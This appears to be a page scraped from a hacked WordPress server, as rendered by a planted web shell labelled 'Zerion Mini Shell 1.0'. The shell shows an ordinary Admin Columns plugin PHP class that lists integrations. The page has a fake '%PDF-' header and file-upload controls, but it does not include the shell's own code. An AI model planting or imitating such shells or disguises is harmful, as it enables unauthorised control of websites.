%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/cwg/wp-content/plugins/codepress-admin-columns/classes/
Upload File :
Create Path :
Current File : //var/www/cwg/wp-content/plugins/codepress-admin-columns/classes/Integrations.php

<?php

namespace AC;

class Integrations extends ArrayIterator {

	public function __construct() {
		$integrations = [
			new Integration\ACF(),
			new Integration\BuddyPress(),
			new Integration\EventsCalendar(),
			new Integration\NinjaForms(),
			new Integration\Pods(),
			new Integration\Types(),
			new Integration\MetaBox(),
			new Integration\WooCommerce(),
			new Integration\YoastSeo(),
		];

		parent::__construct( $integrations );
	}

	/**
	 * @return Integration[]
	 */
	public function all() {
		return $this->array;
	}

}

Zerion Mini Shell 1.0